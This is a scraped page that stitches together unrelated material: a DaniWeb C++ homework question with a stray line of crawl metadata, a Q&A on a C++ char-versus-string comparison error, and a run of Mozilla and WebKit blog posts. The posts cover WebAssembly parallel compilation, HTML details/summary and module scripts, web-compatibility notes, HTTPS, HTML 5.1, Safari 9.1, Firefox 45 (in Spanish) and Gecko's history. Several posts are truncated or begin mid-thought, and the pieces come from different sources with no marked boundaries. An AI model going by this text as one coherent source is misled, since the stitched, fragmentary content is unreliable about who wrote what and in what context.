Put the main function within an "again" loop that will continue until the user no longer wants to.(skip a line between each sets output).
Could you please explain to me how i'd go about creating two such functions? I had a bit of problem grasping the concept of functions....thanks. The above program does work, but it doesn't have the two distinct functions as is requested. | https://www.daniweb.com/programming/software-development/threads/92562/c-functions-to-compare-numbers | CC-MAIN-2017-17 | refinedweb | 232 | 67.08 |
Question:
I am trying an example from Bjarne Stroustrup's C++ book, third edition. While implementing a rather simple function, I get the following compile time error:
error: ISO C++ forbids comparison between pointer and integer
What could be causing this? Here is the code. The error is in the
if line:
#include <iostream> #include <string> using namespace std; bool accept() { cout << "Do you want to proceed (y or n)?\n"; char answer; cin >> answer; if (answer == "y") return true; return false; }
Thanks!
Solution:1
You have two ways to fix this. The preferred way is to use:
string answer;
(instead of
char). The other possible way to fix it is:
if (answer == 'y') ...
(note single quotes instead of double, representing a
char constant).
Solution:2
A string literal is delimited by quotation marks and is of type char* not char.
Example:
"hello"
So when you compare a char to a char* you will get that same compiling error.
char c = 'c'; char *p = "hello"; if(c==p)//compiling error { }
To fix use a char literal which is delimited by single quotes.
Example:
'c'
Solution:3
You need the change those double quotation marks into singles. ie.
if (answer == 'y') returns
true;
Here is some info on String Literals in C++:
Solution:4
"y" is a string/array/pointer. 'y' is a char/integral type
Solution:5
You must remember to use single quotes for char constants. So use
if (answer == 'y') return true;
Rather than
if (answer == "y") return true;
I tested this and it works
Note:If u also have question or solution just comment us below or mail us on toontricks1994@gmail.com
EmoticonEmoticon | http://www.toontricks.com/2019/02/tutorial-c-compile-error-iso-c-forbids.html | CC-MAIN-2019-09 | refinedweb | 277 | 63.39 |
<figure>
Psst… Jeremy! Right now you’re getting notified every time something is posted to Slack. That’s great at first, but now that activity is increasing you’ll probably prefer dialing that down.
<figcaption> —Slackbot, 2015 </figcaption> </figure>
<figure>
What’s happening?
<figcaption> —Twitter, 2009 </figure>
<figure>
Why does everyone always look at me? I know I’m a chalkboard and that’s my job, I just wish people would ask before staring at me. Sometimes I don’t have anything to say.
<figcaption> —Existentialist chalkboard, 2007 </figcaption> </figure>
<figure>.
<figcaption> —Little MOO, 2006 </figcaption> </figure>
<figure>
It looks like you’re writing a letter.
<figcaption> —Clippy, 1997 </figcaption> </figure>
<figure>.
<figcaption> —The Warlock Of Firetop Mountain, 1982 </figure>
<figure>
Welcome to Adventure!! Would you like instructions?
<figcaption> —Colossal Cave, 1976 </figcaption> </figure>
<figure>
I am a lead pencil—the ordinary wooden pencil familiar to all boys and girls and adults who can read and write.
<figcaption> —I, Pencil, 1958 </figcaption> </figure>
<figure>
ÆLFRED MECH HET GEWYRCAN
Ælfred ordered me to be made
<figcaption>
—The Ælfred Jewel, ~880
</figcaption>
</figure>.
In December 2015, I've worked on reducing startup time of asm.js programs in Firefox by making compilation more parallel. As our JavaScript engine, Spidermonkey, uses the same compilation pipeline for both asm.js and WebAssembly, this also benefitted WebAssembly compilation. Now is a good time to talk about what it meant, how it got achieved and what are the next ideas to make it even faster.
Parallelization consists of splitting a sequential program into smaller
independent tasks, then having them run on different CPU. If your program
is using
N cores, it can be up to
N times faster.
Well, in theory. Let's say you're in a car, driving on a 100 Km long road. You've already driven the first 50 Km in one hour. Let's say your car can have unlimited speed from now on. What is the maximal average speed you can reach, once you get to the end of the road?
People intuitively answer "If it can go as fast as I want, so nearby lightspeed
sounds plausible". But this is not true! In fact, if you could teleport from
your current position to the end of the road, you'd have traveled 100 Km in one
hour, so your maximal theoritical speed is 100 Km per hour. This result is a
consequence of Amdahl's law.
When we get back to our initial problem, this means you can expect a
N times
speedup if you're running your program with
N cores if, and only if your
program can be entirely run in parallel. This is usually not the case, and
that is why most wording refers to speedups up to N times faster, when it
comes to parallelization.
Now, say your program is already running some portions in parallel. To make it faster, one can identify some parts of the program that are sequential, and make them independent so that you can run them in parallel. With respect to our car metaphor, this means augmenting the portion of the road on which you can run at unlimited speed.
This is exactly what we have done with parallel compilation of asm.js programs under Firefox.
I recommend to read this blog post. It clearly explains the differences between JIT (Just In Time) and AOT (Ahead Of Time) compilation, and elaborates on the different parts of the engines involved in the compilation pipeline.
As a TL;DR, keep in mind that asm.js is a strictly validated, highly optimizable, typed subset of JavaScript. Once validated, it guarantees high performance and stability (no garbage collector involved!). That is ensured by mapping every single JavaScript instruction of this subset to a few CPU instructions, if not only a single instruction. This means an asm.js program needs to get compiled to machine code, that is, translated from JavaScript to the language your CPU directly manipulates (like what GCC would do for a C++ program). If you haven't heard, the results are impressive and you can run video games directly in your browser, without needing to install anything. No plugins. Nothing more than your usual, everyday browser.
Because asm.js programs can be gigantic in size (in number of functions as well as in number of lines of code), the first compilation of the entire program is going to take some time. Afterwards, Firefox uses a caching mechanism that prevents the need for recompilation and almost instaneously loads the code, so subsequent loadings matter less*. The end user will mostly wait for the first compilation, thus this one needs to be fast.
Before the work explained below, the pipeline for compiling a single function (out of an asm.js module) would look like this:
So far, only the MIR optimization passes, register allocation and LIR generation were done in parallel. Wouldn't it be nice to be able to do more?
* There are conditions for benefitting from the caching mechanism. In particular, the script should be loaded asynchronously and it should be of a consequent size.
Our goal is to make more work in parallel: so can we take out MIR generation from the main thread? And we can take out code generation as well?
The answer happens to be yes to both questions.
For the former, instead of emitting a MIR graph as we parse the function's body, we emit a small, compact, pre-order representation of the function's body..
Now, instead of parsing and generating MIR in a single pass, we would now parse and generate wasm IR in one pass, and generate the MIR out of the wasm IR in another pass. The wasm IR is very compact and much cheaper to generate than a full MIR graph, because generating a MIR graph needs some algorithmic work, including the creation of Phi nodes (join values after any form of branching). As a result, it is expected that compilation time won't suffer. This was a large refactoring: taking every single asm.js instructions, and encoding them in a compact way and later decode these into the equivalent MIR nodes.
For the second part, could we generate code on other threads? One structure in
the code base, the MacroAssembler, is used to generate all the code and it
contains all necessary metadata about offsets. By adding more metadata there to
abstract internal calls **, we can describe the new scheme in terms of a
classic functional
map/
reduce:
mapoperation, transforming an array of wasm IR into an array of MacroAssemblers.
reduceoperation, merging each MacroAssembler within the module's one.
At the end of the compilation of the entire module, there is still some light work to be done: offsets of internal calls need to be translated to their actual locations. All this work has been done in this bugzilla bug.
* In fact, at the time when this was being done, we used a different superset of wasm. Since then, work has been done so that our asm.js frontend is really just another wasm emitter.
** referencing functions by their appearance order index in the module, rather than an offset to the actual start of the function. This order is indeed stable, from a function to the other.
Benchmarking has been done on a Linux x64 machine with 8 cores clocked at 4.2 Ghz.
First, compilation times of a few asm.js massive games:
The X scale is the compilation time in seconds, so lower is better. Each value point is the best one of three runs. For the new scheme, the corresponding relative speedup (in percentage) has been added:
For all games, compilation is much faster with the new parallelization scheme.
Now, let's go a bit deeper. The Linux CLI tool
perf has a
stat command
that gives you an average of the number of utilized CPUs during the program
execution. This is a great measure of threading efficiency: the more a CPU is
utilized, the more it is not idle, waiting for other results to come, and thus
useful. For a constant task execution time, the more utilized CPUs, the more
likely the program will execute quickly.
The X scale is the number of utilized CPUs, according to the
perf stat
command, so higher is better. Again, each value point is the best one of three
runs.
With the older scheme, the number of utilized CPUs quickly rises up from 1 to 4 cores, then more slowly from 5 cores and beyond. Intuitively, this means that with 8 cores, we almost reached the theoritical limit of the portion of the program that can be made parallel (not considering the overhead introduced by parallelization or altering the scheme).
But with the newer scheme, we get much more CPU usage even after 6 cores! Then it slows down a bit, although it is still more significant than the slow rise of the older scheme. So it is likely that with even more threads, we could have even better speedups than the one mentioned beforehand. In fact, we have moved the theoritical limit mentioned above a bit further: we have expanded the portion of the program that can be made parallel. Or to keep on using the initial car/road metaphor, we've shortened the constant speed portion of the road to the benefit of the unlimited speed portion of the road, resulting in a shorter trip overall.
Despite these improvements, compilation time can still be a pain, especially on mobile. This is mostly due to the fact that we're running a whole multi-million line codebase through the backend of a compiler to generate optimized code. Following this work, the next bottleneck during the compilation process is parsing, which matters for asm.js in particular, which source is plain text. Decoding WebAssembly is an order of magnitude faster though, and it can be made even faster. Moreover, we have even more load-time optimizations coming down the pipeline!
In the meanwhile, we keep on improving the WebAssembly backend. Keep track of our progress on bug 1188259!
Once.
Also presented by Pomax was an HTML5 multiplayer Mahjong game. It allows four players to play the classic Chinese game online by using socket.io and a Node.js server to connect the players. The frontend is built using React and Webpack..!
On the dev-platform mailing-list, Ting-Yu Lin has sent an Intent to Ship: HTML5
<details> and
<summary> tags. So what about it?
HTML 5.1 specification describes
details as:
The details element represents a disclosure widget from which the user can obtain additional information or controls.
which is not that clear, luckily enough the specification has some examples. I put one on codepen (you need Firefox Nightly at this time or Chrome/Opera or Safari dev edition to see it). At least the rendering seems to be pretty much the same.
But as usual evil is in the
details (pun not intended at first). In case, the developer would want to hide the triangle, the possibilities are for now not interoperable. Think here possible Web compatibility issues. I created another codepen for testing the different scenarios.
In Blink/WebKit world:
summary::-webkit-details-marker { display: none; }
In Gecko world:
summary::-moz-list-bullet { list-style-type: none; }
or
summary { display: block; }
These work, though the summary
{display: block;} is a call for catastrophes.
Then on the thread there was the proposal of
summary { list-style-type: none; }
which is indeed working for hiding the arrow, but doesn't do anything whatsoever in Blink and WebKit. So it's not really a reliable solution from a Web compatibility point of view.
Then usually I like to look at what people do on GitHub for their projects. So these are a collection of things on the usage of
-webkit-details-marker:
details summary::-webkit-details-marker { display:none; } /* to change the pointer on hover */ details summary { cursor: pointer; } /* to style the arrow widget on opening and closing */ details[open] summary::-webkit-details-marker { color: #00F; background: #0FF;} /* to replace the marker with an image */ details summary::-webkit-details-marker:after { content: icon('file.png'); /* using content this time for a unicode character */ summary::-webkit-details-marker {display: none; } details summary::before { content:"►"; } details[open] summary::before { content:"▼" }
On JavaScript side, it seems there is a popular shim used by a lot of people: details.js
Otsukare!
One thing we’ve been meaning to do more of is tell our blog readers more about new features we’ve been working on across WHATWG standards. We have quite a backlog of exciting things that have happened, and I’ve been nominated to start off by telling you the story of
<script type="module">.
JavaScript modules have a long history. They were originally slated to be finalized in early 2015 (as part of the “ES2015” revision of the JavaScript specification), but as the deadline drew closer, it became clear that although the syntax was ready, the semantics of how modules load each other were still up in the air. This is a hard problem anyway, as it involves extensive integration between the JavaScript engine and its “host environment”—which could be either a web browser, or something else, like Node.js.
The compromise that was reached was to have the JavaScript specification specify the syntax of modules, but without any way to actually run them. The host environment, via a hook called HostResolveImportedModule, would be responsible for resolving module specifiers (the
"x" in
import x from "x") into module instances, by executing the modules and fetching their dependencies. And so a year went by with JavaScript modules not being truly implementable in web browsers, as while their syntax was specified, their semantics were not yet.
In the epic whatwg/html#433 pull request, we worked on specifying these missing semantics. This involved a lot of deep changes to the script execution pipeline, to better integrate with the modern JavaScript spec. The WHATWG community had to discuss subtle issues like how cross-origin module scripts were fetched, or how/whether the
async,
defer, and
charset attributes applied. The end result can be seen in a number of places in the HTML Standard, most notably in the definition of the
script element and the scripting processing model sections. At the request of the Edge team, we also added support for worker modules, which you can see in the section on creating workers. (This soon made it over to the service workers spec as well!) To wrap things up, we included some examples: a couple for
<script type="module">, and one for module workers.
Of course, specifying a feature is not the end; it also needs to be implemented! Right now there is active implementation work happening in all four major rendering engines, which (for the open source engines) you can follow in these bugs:
And there's more work to do on the spec side, too! There's ongoing discussion of how to add more advanced dynamic module-loading APIs, from something simple like a promise-returning
self.importModule, all the way up to the experimental ideas being prototyped in the whatwg/loader repository.
We hope you find the addition of JavaScript modules to the HTML Standard as exciting as we do. And we'll be back to tell you more about other recent important changes to the world of WHATWG standards soon!
Daruma is a little doll where you draw an eye on a status with a wish in mind. And finally draw the second eye, once the wishes has been realized. This week Tokyo Metro and Yahoo! Japan fixed their markup. Tune of the week: Pretty Eyed Baby - Eri Chiemi.
Progress this week:
Today: 2016-04-11T07:29:54.738014 368 open issues ---------------------- needsinfo 3 needsdiagnosis 124 needscontact 32 contactready 94 sitewait 116 ----------------------
You are welcome to participate
The feed of otsukare (this blog) doesn't have an
updated element. That was bothering me too. There was an open issue about it on Pelican issues tracker. Let's propose a pull request. It was accepted after a couple of up and down.
We had a team meeting this week.
Understanding Web compatibility is hard. It doesn't mean the same exact thing for everyone. We probably need to better define for others what it means. Maybe the success stories could help with concrete examples to give the perimeter of what is a Web Compat issue.
Looking at who is opening issues on WebCompat.com I was pleasantly surprised by the results.
(a selection of some of the bugs worked on this week).
perspectiveto an arbitrary
0.0001px. I added the results to the issue. I contacted the Web site owners where we found the issue. Also funny details of implementation in Gecko, another codepen.
transform: perspective(0.00000000000000000000000000000000001px) translate(260px, 0);is considered not zero.
transform: perspective(0.000000000000000000000000000000000001px) translate(260px, 0);is considered something else, but not sure what.
s/Apple/Market Share Gorilla/. Currently there are very similar thing in some ways happening for Chrome on the Desktop market. The other way around, aka implementing fancy APIs that Web developers rush to use on their site and create Web Compatibility issues. The issue is not that much about being late at implementing, or being early at implementing. The real issue is the market share dominance, which warps the way people think about the technology and in the end making it difficult for other players to even exist in the market. I have seen that for Opera on Desktop, and I have seen that for Firefox on Mobile. And bear with me, it was Microsoft (Desktop) in the past, it is Google (Desktop) and Apple (Mobile) now, it will be another company in the future, the one dominating the market share.
width
<object>for Firefox only.
Otsukare!
In part 4, we looked at hardening default configurations and avoiding known vulnerabilities, but what other advantages are there to having our sites run HTTPS?
First, a recap of what we get by using HTTPS:
*unless the uses’ computers are infected with a virus or some kind of browser malware that modifies pages after the browser has decrypted them, or modifies the content before sending it back to the network via the browser–Remember I said that security is not 100% guaranteed? Sorry to scare you. You’re welcome
So that’s cool, but there’s even more!
Most of the newest platform features are only available if served via HTTPS, and some existing features, such as GeoLocation or AppCache, will only work if served under HTTPS too. For example:
While this is ‘annoying’,.
The core goals for future HTML specifications are to match reality better, to make the specification as clear as possible to readers, and of course to make it possible for all stakeholders to propose improvements, and understand what makes changes to HTML successful.
The plan is to ship an HTML5.1 Recommendation in September 2016. This means we will need to have a Candidate Recommendation by the middle of June, following a Call For Consensus based on the most recent Working Draft.
To make it easier for people to review changes, an updated Working Draft will be published approximately once a month. For convenience, changes are noted within the specification itself.
Longer term we would like to “rinse and repeat”, making regular incremental updates to HTML a reality that is relatively straightforward to implement. In the meantime you can track progress using Github pulse, or by following @HTML_commits or @HTMLWG on Twitter.
The specification is on Github, so anyone who can make a Pull Request can propose changes. For simple changes such as grammar fixes, this is a very easy process to learn – and simple changes will generally be accepted by the editors with no fuss.
If you find something in the specification that generally doesn’t work in shipping browsers, please file an issue, or better still file a Pull Request to fix it. We will generally remove things that don’t have adequate support in at least two shipping browser engines, even if they are useful to have and we hope they will achieve sufficient support in the future: in some cases, you can or we may propose the dropped feature as a future extension – see below regarding “incubation”.
HTML is a very large specification. It is developed from a set of source files, which are processed with the Bikeshed
preprocessor. This automates things like links between the various sections, such as to element definitions. Significant
changes, even editorial ones, are likely to require a basic knowledge of how Bikeshed works, and we will continue to improve the
documentation especially for beginners.
HTML is covered by the W3C Patent Policy, so many potential patent holders have already ensured that it can be implemented without paying them any license fee. To keep this royalty-free licensing, any “substantive change” – one that actually changes conformance – must be accompanied by the patent commitment that has already been made by all participants in the Web Platform Working Group. If you make a Pull Request, this will automatically be checked, and the editors, chairs, or W3C staff will contact you to arrange the details. Generally this is a fairly simple process.
For substantial new features we prefer a separate module to be developed, “incubated”, to ensure that there is real support from the various kinds of implementers including browsers, authoring tools, producers of real content, and users, and when it is ready for standardisation to be proposed as an extension specification for HTML. The Web Platform Incubator Community Group (WICG) was set up for this purpose, but of course when you develop a proposal, any venue is reasonable. Again, we ask that you track technical contributions to the proposal (WICG will help do this for you), so we know when it arrives that people who had a hand in it have also committed to W3C’s royalty-free patent licensing and developers can happily implement it without a lot of worry about whether they will later be hit with a patent lawsuit.
W3C’s process for developing Recommendations requires a Working Group to convince the W3C Director, Tim Berners-Lee, that the specification
“is sufficiently clear, complete, and relevant to market needs, to ensure that independent interoperable implementations of each feature of the specification will be realized”
This had to be done for HTML 5.0. When a change is proposed to HTML we expect it to have enough tests to demonstrate that it does improve interoperability. Ideally these fit into an automatable testing system like the “Webapps test harness“. But in practice we plan to accept tests that demonstrate the necessary interoperability, whether they are readily automated or not.
The benefit of this approach is that except where features are removed from browsers, which is comparatively rare, we will have a consistently increasing level of interoperability as we accept changes, meaning that at any time a snapshot of the Editors’ draft should be a stable basis for an improved version of HTML that can be published as an updated version of an HTML Recommendation.
We want HTML to be a specification that authors and implementors can use with ease and confidence. The goal isn’t perfection (which is after all the enemy of good), but rather to make HTML 5.1 better than HTML 5.0 – the best HTML specification until we produce HTML 5.2…
And we want you to feel welcome to participate in improving HTML, for your own purposes and for the good of the Web.
Chaals, Léonie, Ade – chairs
Alex, Arron, Steve, Travis – editors
The..
Last week, a new version of Safari shipped with the release of iOS 9.3 and OS X El Capitan 10.11.4. Safari on iOS 9.3 and Safari 9.1 on OS X are significant releases that incorporate a lot of exciting web features from WebKit. These are web features that were considered ready to go, and we simply couldn’t wait to share them with users and developers alike.
On top of new web features, this release improves the way people experience the web with more responsiveness on iOS, new gestures on OS X, and safer JavaScript dialogs. Developers will appreciate the extra polish, performance and new tools available in Web Inspector.
Here is a brief review of what makes this release so significant.
The
<picture> element is a container that is used to group different
<source> versions of the same image. It offers a fallback approach so the browser can choose the right image depending on device capabilities, like pixel density and screen size. This comes in handy for using new image formats with built-in graceful degradation to well-supported image formats. The ability to specify media queries in the
media attribute on the
<source> elements brings art direction of images to responsive web design.
For more on the
<picture> element, take a look at the HTML 5.1 spec.
CSS variables, known formally as CSS Custom Properties, let developers reduce code duplication, code complexity and make maintenance of CSS much easier. Recently we talked about how Web Inspector took advantage of CSS variables, to reduce code duplication and shed many CSS rules.
You can read more about CSS Variables in WebKit.
CSS font features allow you to use special text styles and effects available in fonts like ligatures and small caps. These aren’t faux representations manufactured by the browser, but the intended styles designed by the font author.
For more information, read the CSS Font Features blog post.
The CSS
will-change property lets you tell the browser ahead of time about changes that are likely to happen on an element. The hint gives browsers a heads-up so that they can make engine optimizations to deliver smooth performance.
Read more about
will-change in the CSS Will Change Module Level 1 spec.
Already available in WebKit for iOS, gesture events are supported on OS X with Safari 9.1. Gesture events are used to detect pinching and rotation on trackpads.
See the GestureEvent Class Reference for more details.
WebKit for iOS has a 350 millisecond delay to allow detecting double-tapping to zoom content that appears too small on mobile devices. With the release of Safari 9.1, WebKit on iOS removes the delay for web content that is designed for the mobile viewport size.
Read about More Responsive Tapping on iOS for details on how to ensure web pages can get this fast-tap behavior.
To protect users from bad actors using JavaScript dialogs in unscrupulous ways, the dialogs in Safari 9.1 were redesigned to look and work more like web content. The new behavior means that dialogs no longer prevent a user from navigating away or closing the page. Instead users can more clearly understand the dialogs come from the web page they are viewing and easily dismiss them.
For more details, see the Displaying Dialogs section from What’s New in Safari.
Web developers will enjoy several new noteworthy enhancements to debugging and styling with Web Inspector. Faster performance in timelines means debugging complex pages and web apps is easier than ever. The new Watch Expressions section in the Scope Chain sidebar helps a developer to see the data flowing through the JavaScript environment.
In the Elements tab, pseudo-elements such as
::before and
::after are accessible from the DOM tree to make it straightforward to inspect and style them.
Web Inspector also added a Visual Styles sidebar that adds visual tools for modifying webpage styles without requiring memorization of all of the properties and elements of CSS. It makes styling a web page more accessible to designers and developers alike, allowing them to get involved in exploring different styles.
Learn more about how it works in Editing CSS with the Visual Styles Sidebar.
That is a lot of enhancements and refinements for a dot-release. Along with OS X El Capitan, Safari 9.1 is also available on OS X Yosemite and OS X Mavericks — bringing all of these improvements to even more users. We’d love to hear about your favorite new feature. Please send your tweets to @webkit or @jonathandavis and let us know!
News of this week were quite disheartening. Young individuals with dreams of violence and blood. Politicians with words of hate. The Web compatibility bugs seem to be a gentle stroke. Tune of the week: Mad World - Gary Jules.
Finally managed to get the to be triaged bugs to a couple of them. We need to get better as a community at filtering the incoming bugs. There is right now 2 remaining old issues.
Progress this week:
Today: 2016-03-25T10:41:48.606549 418 open issues ---------------------- needsinfo 2 needsdiagnosis 131 needscontact 96 contactready 84 sitewait 105 ----------------------
You are welcome to participate
When working on a invalid webcompat issue, I noticed something in Opera Blink developer tools console which made me happy.
Noticed the message? "jquery-1.6.2.min.js:18 'webkitRequestAnimationFrame' is vendor-specific. Please use the standard 'requestAnimationFrame' instead."
-webkit-border-image
There is progress on the front of
-webkit-border-image and border-style in the WebKit/Blink world. Some Web sites might break which should help to fix them.
Mike kicked off the discussion for London Mozilla meeting on the Webcompat side. If you want to participate and provide a topic that you are ready to push, please add to the wiki and/or the mailing list.
(a selection of some of the bugs worked on this week).
width
<object>for Firefox only.
Otsukare!.
And as usual we have completed our API with some new additions:
Seen.
Progress this week:
Today: 2016-03-18T18:14:59.820644 450 open issues ---------------------- needsinfo 9 needsdiagnosis 130 needscontact 95 contactready 84 sitewait 104 ----------------------
You are welcome to participate
(a selection of some of the bugs worked on this week).
document.write()+ user agent sniffing + bad css selectors = image too big. Another one difficult to contact
form.py, 865 on
database, 969
width
<object>for Firefox only.
Otsukare!
Since.
Hace algunos minutos Mozilla lanzó una nueva versión de Firefox y ya podemos gozar de nuevas e interesantes funcionalidades en nuestro navegador favorito. Si no lo sabías, las versiones del panda rojo ya no serán liberadas cada 6 semanas y de ahora en adelante tendrán un ritmo variado que oscila entre 6 y 8 semanas.
Si alguna vez soñaste con hablarle a una página web y que esta ejecutase acciones al igual que haces en iOS o en Android, desde Firefox ya lo puedes hacer. Web Speech permite incorporar datos en nuestras páginas y aplicaciones web, permitiendo que determinadas funciones como la autenticación puedan ser controladas por la voz.
Web Speech comprende dos componentes fundamentales: el reconocimiento (como su nombre lo indica, se encarga de reconocer la voz desde un dispositivos de entrada) y la síntesis (texto a voz). Para más detalles de cómo emplear esta API puedes leer el artículo publicado en MDN. En GitHub también podrás encontrar algunos ejemplos que ilustran el reconocimiento y síntesis de voz.
Desde la inclusión de Sync en el navegador puedes compartir tu información y preferencias (como marcadores, contraseñas, pestañas abiertas, lista de lectura y complementos instalados) con todos tus dispositivos para mantenerte actualizado y no perderte nada.
Con este lanzamiento, ver las pestañas abiertas en otros dispositivos será mucho más fácil e intuitivo pues al sincronizar inmediatamente se mostrará el botón
en la barra de herramientas, el cual te permite acceder mediante un panel a estas páginas en tu equipo con tan solo un clic. También, mientras busques en la barra de direcciones, las pestañas serán mostradas en la lista desplegable.
Panel que muestra las pestañas abiertas en otros dispositivos
Si nunca has configurado Sync y deseas hacerlo, puedes leer este artículo en la Ayuda de Mozilla. ¡Es muy fácil y rápido!
Gracias a la colaboración de las comunidades Mozilla de Paraguay y Bolivia, y de la Universidad Nacional de Asunción (UNA) ha sido posible traducir Firefox al guaraní, lengua originaria de Latinoamérica y muy empleada en Paraguay junto al español, también es hablada en algunas regiones del sur de Brasil y el norte de Argentina, así como en una zona de Bolivia.
Dicho proyecto, bautizado con el nombre de Aguaratata (zorro de fuego) tuvo una duración de aproximadamente 2 años y se tradujeron más de 45 000 palabras. De esta forma, el guaraní pasará a ser una de las 91 localizaciones o traducciones en las que se puede obtener Firefox.
Panorama, la funcionalidad que nos permitía gestionar grupos y organizar nuestras pestañas finalmente será eliminada de Firefox. Desde hace algún tiempo esta noticia venía dando rumbos, ya que Panorama era usada solamente por menos del 1% de los usuarios y por parte de los desarrolladores, su mantenimiento era complicado frente a los cambios que están sucediendo actualmente en el corazón de Firefox.
Si eres de los que usaba esta característica, cuando actualices a la versión 45 de Firefox, te aparecerá una pestaña especial explicándote lo que ha pasado. Todos tus grupos de pestañas se convertirán en marcadores automáticamente y se guardarán en la carpeta de marcadores. Podrás acceder a ellos haciendo clic en el botón de marcadores
en la barra de herramientas.
Si quieres un reemplazo directo, prueba el complemento Tab Groups. El cual se ha creado directamente a partir del código de Firefox y funciona justo como la antigua función. Si lo instalas antes de actualizar a la versión 45 de Firefox:
Al utilizar Tab Groups será como si no la función no hubiera desaparecido de Firefox y no notarás el cambio al actualizar.
Si prefieres ver la lista completa de novedades, puedes llegarte hasta las notas de lanzamiento (en inglés).
Aún no contamos con la versión para móviles pero cuando las tengamos les avisamos.
Puedes obtener esta versión desde nuestra zona de Descargas en español e inglés para Linux, Mac y Windows. Si te ha gustado, por favor comparte con tus amigos esta noticia en las redes sociales. No dudes en dejarnos un comentario.
I remember a time, not so very long ago, when Gecko powered 4 or 5 non-Mozilla browsers, some of them on exotic platforms, as well as GPS devices, wysiwyg editors, geographic platforms, email clients, image editors, eBook readers, documentation browsers, the UX of virus scanners, etc, as well as a host of innovative and exotic add-ons. In these days, Gecko was considered, among other things, one of the best cross-platform development toolkits available.
The year is now 2016 and, if you look around, you’ll be hard-pressed to find Gecko used outside of Firefoxen (alright, and Thunderbird and Bluegriffon). Did Google or Apple or Microsoft do that? Not at all. I don’t know how many in the Mozilla community remember this, but this was part of a Mozilla strategy. In this post, I’d like to discuss this strategy, its rationale, and the lessons that we may draw from it.
For the first few years of Firefox, enthusiasm for the technology behind the browser was enormous. After years of implementing Gecko from scratch, Mozilla had a kick-ass cross-platform toolkit that covered almost everything from system interaction to network, cryptography, user interface, internationalization, even an add-on mechanism, a scripting language and a rendering engine. For simplicity, let’s call this toolkit XUL. Certainly, XUL had a number of drawbacks, but in many ways, this toolkit was years ahead of everything that other toolkits had to offer at the time. And many started to use XUL for things that had never been planned. Dozens of public projects and certainly countless more behind corporate doors. Attempts were made to extend XUL towards Python, .Net, Java and possibly more. These were the days of the “XUL Planet”. All of this was great – for one, that is how I joined the Mozilla community, embedding Gecko in exotic places and getting it to work nicely with exotic network protocols.
But this success was also hurting Mozilla’s mission in two ways. The first way was the obvious cost. The XUL platform had a huge API, in JavaScript, in C, in C++, in IDL, in declarative UI (XUL and XBL), not to mention its configuration files and exotic query language (hello, RDF, I admit that I don’t really miss you that much), and I’m certain I miss a few. Oh, that’s not including the already huge web-facing API that can never abandon backwards compatibility with any feature, of course. Since third-party developers could hit any point of this not-really-internal API, any change made to the code of Gecko had the potential of breaking applications in subtle and unexpected ways – applications that we often couldn’t test ourselves. This meant that any change needed to be weighed carefully as it could put third-party developers out of business. That’s hardly ideal when you attempt to move quickly. To make things worse, this API was never designed for such a scenario, many bits were extremely fragile and often put together in haste with the idea of taking them down once a better API was available. Unfortunately, in many cases, fixing or replacing components often proved impossible, for the sake of compatibility. And to make things even worse, the XUL platform was targeting an insane number of Operating Systems, including Solaris, RiscOS, OS/2, even the Amiga Workbench if I recall correctly. Any change had to be kept synchronized between all these platforms, or, once again, we could end up putting third-party developers out of business by accident.
So this couldn’t last forever.
Another way this success was hurting Mozilla is that XUL was not the web. Recall that Mozilla’s objectives were not to create yet another cross-platform toolkit, no matter how good, but to Take Back the Web from proprietary and secret protocols. When the WhatWG and HTML5 started rising, it became clear that the web was not only taken back, but that we were witnessing the dawn of a new era of applications, which could run on all operating systems, which were based on open protocols and at least at some level on open-source. The Web Applications were the future – an ideal future, by some criteria – and the future was there. In this context, non-standard, native cross-platform toolkits were a thing of the past, something that Mozilla was fighting, not something that Mozilla should be promoting. It made entire sense to stop putting resources in XUL and concentrate more tightly on the web.
So XUL as a cross-platform toolkit couldn’t last forever.
I’m not sure exactly who took the decision but at some point around 2009, Mozilla’s strategy changed. We started deprecating the use cases of Gecko that were not the Web Platform. This wasn’t a single decision or a single fell swoop, and this didn’t go in one single unambiguous direction, but this happened. We got rid of the impedimenta.
We reinvented Gecko as a Firefox monoculture.
We have now been living in a Gecko monoculture long enough to be able to draw lessons from our choices. So let’s look at the costs and benefits.
Now that third-party developers using Gecko and hitting every single internal API are gone, it is much easier to refactor. Some APIs are clearly internal and I can change them without referring to anyone. Some are still accessible by add-ons, and I need to look for add-ons that use them and get in touch with their developers, but this is still infinitely simpler than it used to be. Already, dozens of refactorings that were critically needed but that had been blocked at some point in the past by backwards internal compatibility have been made possible. Soon,
Jetpack WebExtensions will become the sole entry point for writing most add-ons, and Gecko developers will finally be free to refactor their code at will as long as it doesn’t break public APIs, much like developers of every single other platform on the planet.
Similarly, dropping support for exotic platforms made it possible to drop plenty of legacy code that was hurting refactoring, and in many cases, made it possible to write richer APIs without being bound by the absolute need to implement everything on every single platform.
In other words, by the criteria of reducing costs and increasing agility, yes, the Gecko monoculture has been a clear success.
Our second objective was to promote web applications. And if we look around, these days, web applications are everywhere – except on mobile. Actually, that’s not entirely true. On mobile, a considerable number of applications are built using PhoneGap/Cordova. In other word, these are web applications, wrapped in native applications, with most of the benefits of both worlds. Indeed, one could argue that PhoneGap/Cordova applications are more or less applications which could have been developed with XUL, and are instead developed with a closer-to-standards approach. As a side-note, it is a little-known fact is that one of the many (discarded) designs of FirefoxOS was as a runtime somewhat comparable to PhoneGap/Cordova, and which would have replaced the XUL platform.
Despite the huge success of web applications and even the success of hybrid web/native applications, the brand new world in which everything would be a web application hasn’t arrived yet, and it is not sure that it ever will. The main reason is that mobile has taken over the world. Mobile applications need to integrate with a rather different ecosystem, with push notifications, working disconnected, transactions and microtransactions, etc. not to mention a host of new device-specific features that were not initially web-friendly. Despite the efforts of most browser vendors, browser still haven’t caught up this moving target. New mobile device have gained voice recognition and in the meantime, the WhatWG is still struggling to design a secure, cross-platform API for accessing local files.
In other words, by the criteria of pushing web applications, I would say that the Gecko monoculture has had a positive influence, but not quite enough to be called a success.
The Hackerbase
Now that we have seen the benefits of this Gecko monoculture, perhaps it is time to look at the costs.
By turning Gecko into a Firefox monoculture, we have lost dozens of products. We have almost entirely lost the innovations that were not on the roadmap of the WhatWG, as well as the innovators themselves. Some of them have turned to web applications, which is what we wanted, or hybrid applications, which is close enough to what we wanted. In the meantime, somewhere else in the world, the ease of embedding first WebKit and now Chromium (including Atom/Electron) have made it much easier to experiment and innovate with these platforms, and to do everything that has ever been possible with XUL, and more. Speaking only for myself, if I were to enter the field today with the same kind of technological needs I had 15 years ago, I would head towards Chromium without a second thought. I find it a bit sad that my present self is somehow working against my past self, while they could be working together.
